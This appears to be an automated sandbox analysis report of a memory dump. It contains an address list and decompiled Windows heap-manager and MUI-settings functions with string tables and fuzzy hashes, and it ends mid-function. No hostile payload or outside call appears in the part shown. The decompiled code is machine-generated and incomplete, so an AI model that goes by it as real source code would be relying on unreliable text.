                                      0x019e226e
                                      0x019e224c
                                      0x019e2261
                                      0x019e2266
                                      0x019e2274
                                      0x019e2279
                                      0x019e227e
                                      0x019e2286
                                      0x019e2288
                                      0x019e228d
                                      0x019e228d
                                      0x019e2292
                                      0x019e2292
                                      0x019e2295
                                      0x019e2295
                                      0x00000000
                                      0x019e2295
                                      0x0199a485
                                      0x0199a489
                                      0x0199a48b
                                      0x0199a48f
                                      0x0199a493
                                      0x0199a497
                                      0x0199a49b
                                      0x0199a4bb
                                      0x0199a4bb
                                      0x0199a4bd
                                      0x0199a4ff
                                      0x0199a4ff
                                      0x0199a501
                                      0x0199a505
                                      0x0199a50f
                                      0x0199a517
                                      0x0199a51b
                                      0x0199a527
                                      0x0199a52b
                                      0x019e2182
                                      0x019e2185
                                      0x019e2193
                                      0x019e2199
                                      0x019e2199
                                      0x0199a531
                                      0x0199a535
                                      0x0199a538
                                      0x0199a548
                                      0x0199a54b
                                      0x0199a54d
                                      0x0199a553
                                      0x0199a559
                                      0x019e2100
                                      0x019e2103
                                      0x019e2109
                                      0x019e210f
                                      0x019e2112
                                      0x019e2131
                                      0x019e2136
                                      0x019e2114
                                      0x019e2129
                                      0x019e212e
                                      0x019e213c
                                      0x019e2141
                                      0x019e2147
                                      0x019e214d
                                      0x019e2151
                                      0x019e2154
                                      0x019e2154
                                      0x019e2159
                                      0x019e2159
                                      0x019e2103
                                      0x0199a55f
                                      0x0199a562
                                      0x0199a565
                                      0x0199a567
                                      0x019e2162
                                      0x0199a56d
                                      0x0199a574
                                      0x0199a575
                                      0x0199a579
                                      0x0199a57e
                                      0x019e2169
                                      0x019e216a
                                      0x019e2170
                                      0x019e2175
                                      0x019e2179
                                      0x019e2179
                                      0x0199a57e
                                      0x0199a584
                                      0x0199a58f
                                      0x0199a58f
                                      0x0199a52b
                                      0x0199a5ad
                                      0x0199a5bc
                                      0x0199a5c1
                                      0x0199a5c6
                                      0x0199a5cb
                                      0x0199a5cd
                                      0x019e21a9
                                      0x0199a5d3
                                      0x0199a5d3
                                      0x0199a5d3
                                      0x0199a5d5
                                      0x0199a5d8
                                      0x019e21b3
                                      0x019e21bc
                                      0x019e21c2
                                      0x019e21cd
                                      0x019e21cf
                                      0x019e21da
                                      0x019e21da
                                      0x019e21da
                                      0x019e21f7
                                      0x019e21f7
                                      0x019e21c2
                                      0x0199a5de
                                      0x0199a5e3
                                      0x0199a5e8
                                      0x0199a5ea
                                      0x019e220a
                                      0x0199a5f0
                                      0x0199a5f0
                                      0x0199a5f0
                                      0x0199a5f2
                                      0x0199a5f5
                                      0x019e2219
                                      0x019e221b
                                      0x019e208c
                                      0x019e208c
                                      0x019e208c
                                      0x019e2095
                                      0x019e2096
                                      0x019e2097
                                      0x019e2098
                                      0x019e20a4
                                      0x019e20a5
                                      0x019e20a9
                                      0x019e20a9
                                      0x00000000
                                      0x0199a5f5
                                      0x0199a4bf
                                      0x0199a4d3
                                      0x0199a4d8
                                      0x0199a4da
                                      0x019e1ede
                                      0x019e1ede
                                      0x019e1ee4
                                      0x019e1ee9
                                      0x00000000
                                      0x00000000
                                      0x019e1f07
                                      0x00000000
                                      0x019e1f07
                                      0x0199a4e0
                                      0x0199a4e5
                                      0x0199a4e7
                                      0x019e20cb
                                      0x0199a4ed
                                      0x0199a4ed
                                      0x0199a4ed
                                      0x0199a4f2
                                      0x0199a4f5
                                      0x019e20d5
                                      0x019e20de
                                      0x019e20e4
                                      0x019e20f6
                                      0x019e20f6
                                      0x019e20e4
                                      0x0199a4fb
                                      0x00000000
                                      0x0199a4fb
                                      0x0199a4a1
                                      0x0199a4a4
                                      0x0199a4a8
                                      0x00000000
                                      0x00000000
                                      0x0199a4aa
                                      0x0199a4ac
                                      0x00000000
                                      0x00000000
                                      0x0199a4b2
                                      0x0199a4b5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0199a4b5
                                      0x0199a43a
                                      0x0199a340
                                      0x0199a346
                                      0x0199a600
                                      0x00000000
                                      0x0199a600
                                      0x0199a34f
                                      0x0199a351
                                      0x0199a358
                                      0x0199a3c6
                                      0x00000000
                                      0x0199a371
                                      0x0199a37a
                                      0x0199a37f
                                      0x0199a382
                                      0x0199a384
                                      0x0199a394
                                      0x00000000
                                      0x0199a396
                                      0x0199a399
                                      0x0199a3a7
                                      0x0199a3b0
                                      0x0199a3b4
                                      0x0199a3bb
                                      0x0199a3d2
                                      0x0199a3da
                                      0x0199a3df
                                      0x0199a3e1
                                      0x0199a3e5
                                      0x0199a3ea
                                      0x0199a3f0
                                      0x0199a3f0
                                      0x0199a3e1
                                      0x00000000
                                      0x0199a3bb
                                      0x0199a394

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                      • API String ID: 0-523794902
                                      • Opcode ID: e5c9f24069c2933e7c67af4c4a473fa01b9f507a413fd1675713bd3da55c6339
                                      • Instruction ID: 8e6bd14aa14d90d853575180ab2b5dd4a2edf10c4c06ad7fa9654ac53f1c27d6
                                      • Opcode Fuzzy Hash: e5c9f24069c2933e7c67af4c4a473fa01b9f507a413fd1675713bd3da55c6339
                                      • Instruction Fuzzy Hash: 7842B0316083419FDB16CF2DC488B2ABBE9FF98604F04496DF58A8B352D734D941CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E01A32D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t83;
                                      				signed char _t89;
                                      				intOrPtr _t90;
                                      				signed char _t101;
                                      				signed int _t102;
                                      				intOrPtr _t104;
                                      				signed int _t105;
                                      				signed int _t106;
                                      				intOrPtr _t108;
                                      				intOrPtr _t112;
                                      				short* _t130;
                                      				short _t131;
                                      				signed int _t148;
                                      				intOrPtr _t149;
                                      				signed int* _t154;
                                      				short* _t165;
                                      				signed int _t171;
                                      				void* _t182;
                                      
                                      				_push(0x44);
                                      				_push(0x1a50e80);
                                      				E019CD0E8(__ebx, __edi, __esi);
                                      				_t177 = __edx;
                                      				_t181 = __ecx;
                                      				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                      				 *((char*)(_t182 - 0x1d)) = 0;
                                      				 *(_t182 - 0x24) = 0;
                                      				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                      					 *((intOrPtr*)(_t182 - 4)) = 0;
                                      					 *((intOrPtr*)(_t182 - 4)) = 1;
                                      					_t83 = E019740E1("RtlAllocateHeap");
                                      					__eflags = _t83;
                                      					if(_t83 == 0) {
                                      						L48:
                                      						 *(_t182 - 0x24) = 0;
                                      						L49:
                                      						 *((intOrPtr*)(_t182 - 4)) = 0;
                                      						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                      						E01A330C4();
                                      						goto L50;
                                      					}
                                      					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                      					 *(_t182 - 0x28) = _t89;
                                      					 *(_t182 - 0x3c) = _t89;
                                      					_t177 =  *(_t182 + 8);
                                      					__eflags = _t177;
                                      					if(_t177 == 0) {
                                      						_t171 = 1;
                                      						__eflags = 1;
                                      					} else {
                                      						_t171 = _t177;
                                      					}
                                      					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                      					__eflags = _t148 - 0x10;
                                      					if(_t148 < 0x10) {
                                      						_t148 = 0x10;
                                      					}
                                      					_t149 = _t148 + 8;
                                      					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                      					__eflags = _t149 - _t177;
                                      					if(_t149 < _t177) {
                                      						L44:
                                      						_t90 =  *[fs:0x30];
                                      						__eflags =  *(_t90 + 0xc);
                                      						if( *(_t90 + 0xc) == 0) {
                                      							_push("HEAP: ");
                                      							E0197B150();
                                      						} else {
                                      							E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      						}
                                      						_push( *((intOrPtr*)(_t181 + 0x78)));
                                      						E0197B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                      						goto L48;
                                      					} else {
                                      						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                      						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                      							goto L44;
                                      						}
                                      						__eflags = _t89 & 0x00000001;
                                      						if((_t89 & 0x00000001) != 0) {
                                      							_t178 =  *(_t182 - 0x28);
                                      						} else {
                                      							E0198EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                      							 *((char*)(_t182 - 0x1d)) = 1;
                                      							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                      							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                      						}
                                      						E01A34496(_t181, 0);
                                      						_t177 = L01994620(_t181, _t181, _t178,  *(_t182 + 8));
                                      						 *(_t182 - 0x24) = _t177;
                                      						_t173 = 1;
                                      						E01A349A4(_t181);
                                      						__eflags = _t177;
                                      						if(_t177 == 0) {
                                      							goto L49;
                                      						} else {
                                      							_t177 = _t177 + 0xfffffff8;
                                      							__eflags =  *((char*)(_t177 + 7)) - 5;
                                      							if( *((char*)(_t177 + 7)) == 5) {
                                      								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                      								__eflags = _t177;
                                      							}
                                      							_t154 = _t177;
                                      							 *(_t182 - 0x40) = _t177;
                                      							__eflags =  *(_t181 + 0x4c);
                                      							if( *(_t181 + 0x4c) != 0) {
                                      								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                      								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                      								if(__eflags != 0) {
                                      									_push(_t154);
                                      									_t173 = _t177;
                                      									E01A2FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                      								}
                                      							}
                                      							__eflags =  *(_t177 + 2) & 0x00000002;
                                      							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                      								_t101 =  *(_t177 + 3);
                                      								 *(_t182 - 0x29) = _t101;
                                      								_t102 = _t101 & 0x000000ff;
                                      							} else {
                                      								_t130 = E01971F5B(_t177);
                                      								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                      								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                      								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                      									 *_t130 = 0;
                                      								} else {
                                      									_t131 = E019A16C7(1, _t173);
                                      									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                      									 *_t165 = _t131;
                                      									_t130 = _t165;
                                      								}
                                      								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                      							}
                                      							 *(_t182 - 0x34) = _t102;
                                      							 *(_t182 - 0x28) = _t102;
                                      							__eflags =  *(_t181 + 0x4c);
                                      							if( *(_t181 + 0x4c) != 0) {
                                      								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                      								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                      								__eflags =  *_t177;
                                      							}
                                      							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                      							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                      								__eflags = 0;
                                      								E01A34496(_t181, 0);
                                      							}
                                      							__eflags =  *(_t182 - 0x24) -  *0x1a66360; // 0x0
                                      							_t104 =  *[fs:0x30];
                                      							if(__eflags != 0) {
                                      								_t105 =  *(_t104 + 0x68);
                                      								 *(_t182 - 0x4c) = _t105;
                                      								__eflags = _t105 & 0x00000800;
                                      								if((_t105 & 0x00000800) == 0) {
                                      									goto L49;
                                      								}
                                      								_t106 =  *(_t182 - 0x34);
                                      								__eflags = _t106;
                                      								if(_t106 == 0) {
                                      									goto L49;
                                      								}
                                      								__eflags = _t106 -  *0x1a66364; // 0x0
                                      								if(__eflags != 0) {
                                      									goto L49;
                                      								}
                                      								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1a66366; // 0x0
                                      								if(__eflags != 0) {
                                      									goto L49;
                                      								}
                                      								_t108 =  *[fs:0x30];
                                      								__eflags =  *(_t108 + 0xc);
                                      								if( *(_t108 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      								}
                                      								_push(E01A1D455(_t181,  *(_t182 - 0x28)));
                                      								_push( *(_t182 + 8));
                                      								E0197B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                      								goto L34;
                                      							} else {
                                      								__eflags =  *(_t104 + 0xc);
                                      								if( *(_t104 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      								}
                                      								_push( *(_t182 + 8));
                                      								E0197B150("Just allocated block at %p for %Ix bytes\n",  *0x1a66360);
                                      								L34:
                                      								_t112 =  *[fs:0x30];
                                      								__eflags =  *((char*)(_t112 + 2));
                                      								if( *((char*)(_t112 + 2)) != 0) {
                                      									 *0x1a66378 = 1;
                                      									 *0x1a660c0 = 0;
                                      									asm("int3");
                                      									 *0x1a66378 = 0;
                                      								}
                                      								goto L49;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					_t181 =  *0x1a65708; // 0x0
                                      					 *0x1a6b1e0(__ecx, __edx,  *(_t182 + 8));
                                      					 *_t181();
                                      					L50:
                                      					return E019CD130(0, _t177, _t181);
                                      				}
                                      			}

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                      • API String ID: 0-1745908468
                                      • Opcode ID: 6d4b369bf541b5c39c0c8d9a22d81ce4ac3e8e58a102ffeb6b228bf341803dcf
                                      • Instruction ID: 579f6155f8266bf53ebe484346ad10b91a43cbe0fe8c6f244a6532a0b1f80fc3
                                      • Opcode Fuzzy Hash: 6d4b369bf541b5c39c0c8d9a22d81ce4ac3e8e58a102ffeb6b228bf341803dcf
                                      • Instruction Fuzzy Hash: 5F91FF356146819FDB22DFA8D455BADFBF2BFC9710F18805EF54AAB252C7329842CB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E01983D34(signed int* __ecx) {
                                      				signed int* _v8;
                                      				char _v12;
                                      				signed int* _v16;
                                      				signed int* _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				char _v36;
                                      				signed int _v40;
                                      				signed int _v44;
                                      				signed int* _v48;
                                      				signed int* _v52;
                                      				signed int _v56;
                                      				signed int _v60;
                                      				char _v68;
                                      				signed int _t140;
                                      				signed int _t161;
                                      				signed int* _t236;
                                      				signed int* _t242;
                                      				signed int* _t243;
                                      				signed int* _t244;
                                      				signed int* _t245;
                                      				signed int _t255;
                                      				void* _t257;
                                      				signed int _t260;
                                      				void* _t262;
                                      				signed int _t264;
                                      				void* _t267;
                                      				signed int _t275;
                                      				signed int* _t276;
                                      				short* _t277;
                                      				signed int* _t278;
                                      				signed int* _t279;
                                      				signed int* _t280;
                                      				short* _t281;
                                      				signed int* _t282;
                                      				short* _t283;
                                      				signed int* _t284;
                                      				void* _t285;
                                      
                                      				_v60 = _v60 | 0xffffffff;
                                      				_t280 = 0;
                                      				_t242 = __ecx;
                                      				_v52 = __ecx;
                                      				_v8 = 0;
                                      				_v20 = 0;
                                      				_v40 = 0;
                                      				_v28 = 0;
                                      				_v32 = 0;
                                      				_v44 = 0;
                                      				_v56 = 0;
                                      				_t275 = 0;
                                      				_v16 = 0;
                                      				if(__ecx == 0) {
                                      					_t280 = 0xc000000d;
                                      					_t140 = 0;
                                      					L50:
                                      					 *_t242 =  *_t242 | 0x00000800;
                                      					_t242[0x13] = _t140;
                                      					_t242[0x16] = _v40;
                                      					_t242[0x18] = _v28;
                                      					_t242[0x14] = _v32;
                                      					_t242[0x17] = _t275;
                                      					_t242[0x15] = _v44;
                                      					_t242[0x11] = _v56;
                                      					_t242[0x12] = _v60;
                                      					return _t280;
                                      				}
                                      				if(E01981B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                      					_v56 = 1;
                                      					if(_v8 != 0) {
                                      						L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                      					}
                                      					_v8 = _t280;
                                      				}
                                      				if(E01981B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                      					_v60 =  *_v8;
                                      					L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                      					_v8 = _t280;
                                      				}
                                      				if(E01981B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                      					L16:
                                      					if(E01981B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                      						L28:
                                      						if(E01981B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                      							L46:
                                      							_t275 = _v16;
                                      							L47:
                                      							_t161 = 0;
                                      							L48:
                                      							if(_v8 != 0) {
                                      								L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                      							}
                                      							_t140 = _v20;
                                      							if(_t140 != 0) {
                                      								if(_t275 != 0) {
                                      									L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                      									_t275 = 0;
                                      									_v28 = 0;
                                      									_t140 = _v20;
                                      								}
                                      							}
                                      							goto L50;
                                      						}
                                      						_t167 = _v12;
                                      						_t255 = _v12 + 4;
                                      						_v44 = _t255;
                                      						if(_t255 == 0) {
                                      							_t276 = _t280;
                                      							_v32 = _t280;
                                      						} else {
                                      							_t276 = L01994620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                      							_t167 = _v12;
                                      							_v32 = _t276;
                                      						}
                                      						if(_t276 == 0) {
                                      							_v44 = _t280;
                                      							_t280 = 0xc0000017;
                                      							goto L46;
                                      						} else {
                                      							E019BF3E0(_t276, _v8, _t167);
                                      							_v48 = _t276;
                                      							_t277 = E019C1370(_t276, 0x1954e90);
                                      							_pop(_t257);
                                      							if(_t277 == 0) {
                                      								L38:
                                      								_t170 = _v48;
                                      								if( *_v48 != 0) {
                                      									E019BBB40(0,  &_v68, _t170);
                                      									if(L019843C0( &_v68,  &_v24) != 0) {
                                      										_t280 =  &(_t280[0]);
                                      									}
                                      								}
                                      								if(_t280 == 0) {
                                      									_t280 = 0;
                                      									L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                      									_v44 = 0;
                                      									_v32 = 0;
                                      								} else {
                                      									_t280 = 0;
                                      								}
                                      								_t174 = _v8;
                                      								if(_v8 != 0) {
                                      									L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                      								}
                                      								_v8 = _t280;
                                      								goto L46;
                                      							}
                                      							_t243 = _v48;
                                      							do {
                                      								 *_t277 = 0;
                                      								_t278 = _t277 + 2;
                                      								E019BBB40(_t257,  &_v68, _t243);
                                      								if(L019843C0( &_v68,  &_v24) != 0) {
                                      									_t280 =  &(_t280[0]);
                                      								}
                                      								_t243 = _t278;
                                      								_t277 = E019C1370(_t278, 0x1954e90);
                                      								_pop(_t257);
                                      							} while (_t277 != 0);
                                      							_v48 = _t243;
                                      							_t242 = _v52;
                                      							goto L38;
                                      						}
                                      					}
                                      					_t191 = _v12;
                                      					_t260 = _v12 + 4;
                                      					_v28 = _t260;
                                      					if(_t260 == 0) {
                                      						_t275 = _t280;
                                      						_v16 = _t280;
                                      					} else {
                                      						_t275 = L01994620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                      						_t191 = _v12;
                                      						_v16 = _t275;
                                      					}
                                      					if(_t275 == 0) {
                                      						_v28 = _t280;
                                      						_t280 = 0xc0000017;
                                      						goto L47;
                                      					} else {
                                      						E019BF3E0(_t275, _v8, _t191);
                                      						_t285 = _t285 + 0xc;
                                      						_v48 = _t275;
                                      						_t279 = _t280;
                                      						_t281 = E019C1370(_v16, 0x1954e90);
                                      						_pop(_t262);
                                      						if(_t281 != 0) {
                                      							_t244 = _v48;
                                      							do {
                                      								 *_t281 = 0;
                                      								_t282 = _t281 + 2;
                                      								E019BBB40(_t262,  &_v68, _t244);
                                      								if(L019843C0( &_v68,  &_v24) != 0) {
                                      									_t279 =  &(_t279[0]);
                                      								}
                                      								_t244 = _t282;
                                      								_t281 = E019C1370(_t282, 0x1954e90);
                                      								_pop(_t262);
                                      							} while (_t281 != 0);
                                      							_v48 = _t244;
                                      							_t242 = _v52;
                                      						}
                                      						_t201 = _v48;
                                      						_t280 = 0;
                                      						if( *_v48 != 0) {
                                      							E019BBB40(_t262,  &_v68, _t201);
                                      							if(L019843C0( &_v68,  &_v24) != 0) {
                                      								_t279 =  &(_t279[0]);
                                      							}
                                      						}
                                      						if(_t279 == 0) {
                                      							L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                      							_v28 = _t280;
                                      							_v16 = _t280;
                                      						}
                                      						_t202 = _v8;
                                      						if(_v8 != 0) {
                                      							L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                      						}
                                      						_v8 = _t280;
                                      						goto L28;
                                      					}
                                      				}
                                      				_t214 = _v12;
                                      				_t264 = _v12 + 4;
                                      				_v40 = _t264;
                                      				if(_t264 == 0) {
                                      					_v20 = _t280;
                                      				} else {
                                      					_t236 = L01994620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                      					_t280 = _t236;
                                      					_v20 = _t236;
                                      					_t214 = _v12;
                                      				}
                                      				if(_t280 == 0) {
                                      					_t161 = 0;
                                      					_t280 = 0xc0000017;
                                      					_v40 = 0;
                                      					goto L48;
                                      				} else {
                                      					E019BF3E0(_t280, _v8, _t214);
                                      					_t285 = _t285 + 0xc;
                                      					_v48 = _t280;
                                      					_t283 = E019C1370(_t280, 0x1954e90);
                                      					_pop(_t267);
                                      					if(_t283 != 0) {
                                      						_t245 = _v48;
                                      						do {
                                      							 *_t283 = 0;
                                      							_t284 = _t283 + 2;
                                      							E019BBB40(_t267,  &_v68, _t245);
                                      							if(L019843C0( &_v68,  &_v24) != 0) {
                                      								_t275 = _t275 + 1;
                                      							}
                                      							_t245 = _t284;
                                      							_t283 = E019C1370(_t284, 0x1954e90);
                                      							_pop(_t267);
                                      						} while (_t283 != 0);
                                      						_v48 = _t245;
                                      						_t242 = _v52;
                                      					}
                                      					_t224 = _v48;
                                      					_t280 = 0;
                                      					if( *_v48 != 0) {
                                      						E019BBB40(_t267,  &_v68, _t224);
                                      						if(L019843C0( &_v68,  &_v24) != 0) {
                                      							_t275 = _t275 + 1;
                                      						}
                                      					}
                                      					if(_t275 == 0) {
                                      						L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                      						_v40 = _t280;
                                      						_v20 = _t280;
                                      					}
                                      					_t225 = _v8;
                                      					if(_v8 != 0) {
                                      						L019977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                      					}
                                      					_v8 = _t280;
                                      					goto L16;
                                      				}
                                      			}











































                                      Strings
                                      • Kernel-MUI-Language-Disallowed, xrefs: 01983E97
                                      • Kernel-MUI-Language-Allowed, xrefs: 01983DC0
                                      • Kernel-MUI-Number-Allowed, xrefs: 01983D8C
                                      • Kernel-MUI-Language-SKU, xrefs: 01983F70
                                      • WindowsExcludedProcs, xrefs: 01983D6F
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                      • API String ID: 0-258546922
                                      • Opcode ID: 1fca2f81c6ff6d819f827193fa4d9ec84cd472403cc8d7a947b07b9700672119
                                      • Instruction ID: 1b85bc8c2391f16a96a4efd459a8c379c1a16d393bba2cb31b02f4e7874de42c
                                      • Opcode Fuzzy Hash: 1fca2f81c6ff6d819f827193fa4d9ec84cd472403cc8d7a947b07b9700672119
                                      • Instruction Fuzzy Hash: EDF12D72D10619EFCF11EF98C980AEEBBBDFF58650F14446AE909A7251E7349E01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 29%
                                      			E019740E1(void* __edx) {
                                      				void* _t19;
                                      				void* _t29;
                                      
                                      				_t28 = _t19;
                                      				_t29 = __edx;
                                      				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                      						_push("HEAP: ");
                                      						E0197B150();
                                      					} else {
                                      						E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      					}
                                      					E0197B150("Invalid heap signature for heap at %p", _t28);
                                      					if(_t29 != 0) {
                                      						E0197B150(", passed to %s", _t29);
                                      					}
                                      					_push("\n");
                                      					E0197B150();
                                      					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                      						 *0x1a66378 = 1;
                                      						asm("int3");
                                      						 *0x1a66378 = 0;
                                      					}
                                      					return 0;
                                      				}
                                      				return 1;
                                      			}






                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                      • API String ID: 0-188067316
                                      • Opcode ID: d89b1882901b7032a25c2a8f760800633fa52ac19dd9667741d49cf1709de926
                                      • Instruction ID: e5176b2c459089270d7a304c3cc1cb05e6d33e953f5ac89ef0c07fd2c4897021
                                      • Opcode Fuzzy Hash: d89b1882901b7032a25c2a8f760800633fa52ac19dd9667741d49cf1709de926
                                      • Instruction Fuzzy Hash: A7014C36104241AEE325DB69F40DF927BA8EFC1F30F1C802DF40D57641EAA49440C315
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 70%
                                      			E0199A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                      				void* _v5;
                                      				signed short _v12;
                                      				intOrPtr _v16;
                                      				signed int _v20;
                                      				signed short _v24;
                                      				signed short _v28;
                                      				signed int _v32;
                                      				signed short _v36;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed short* _v52;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __ebp;
                                      				signed int _t131;
                                      				signed char _t134;
                                      				signed int _t138;
                                      				char _t141;
                                      				signed short _t142;
                                      				void* _t146;
                                      				signed short _t147;
                                      				intOrPtr* _t149;
                                      				intOrPtr _t156;
                                      				signed int _t167;
                                      				signed int _t168;
                                      				signed short* _t173;
                                      				signed short _t174;
                                      				intOrPtr* _t182;
                                      				signed short _t184;
                                      				intOrPtr* _t187;
                                      				intOrPtr _t197;
                                      				intOrPtr _t206;
                                      				intOrPtr _t210;
                                      				signed short _t211;
                                      				intOrPtr* _t212;
                                      				signed short _t214;
                                      				signed int _t216;
                                      				intOrPtr _t217;
                                      				signed char _t225;
                                      				signed short _t235;
                                      				signed int _t237;
                                      				intOrPtr* _t238;
                                      				signed int _t242;
                                      				unsigned int _t245;
                                      				signed int _t251;
                                      				intOrPtr* _t252;
                                      				signed int _t253;
                                      				intOrPtr* _t255;
                                      				signed int _t256;
                                      				void* _t257;
                                      				void* _t260;
                                      
                                      				_t256 = __edx;
                                      				_t206 = __ecx;
                                      				_t235 = _a4;
                                      				_v44 = __ecx;
                                      				_v24 = _t235;
                                      				if(_t235 == 0) {
                                      					L41:
                                      					return _t131;
                                      				}
                                      				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                      				if(_t251 == 0) {
                                      					__eflags =  *0x1a68748 - 1;
                                      					if( *0x1a68748 >= 1) {
                                      						__eflags =  *(__edx + 2) & 0x00000008;
                                      						if(( *(__edx + 2) & 0x00000008) == 0) {
                                      							_t110 = _t256 + 0xfff; // 0xfe7
                                      							__eflags = (_t110 & 0xfffff000) - __edx;
                                      							if((_t110 & 0xfffff000) != __edx) {
                                      								_t197 =  *[fs:0x30];
                                      								__eflags =  *(_t197 + 0xc);
                                      								if( *(_t197 + 0xc) == 0) {
                                      									_push("HEAP: ");
                                      									E0197B150();
                                      									_t260 = _t257 + 4;
                                      								} else {
                                      									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                      									_t260 = _t257 + 8;
                                      								}
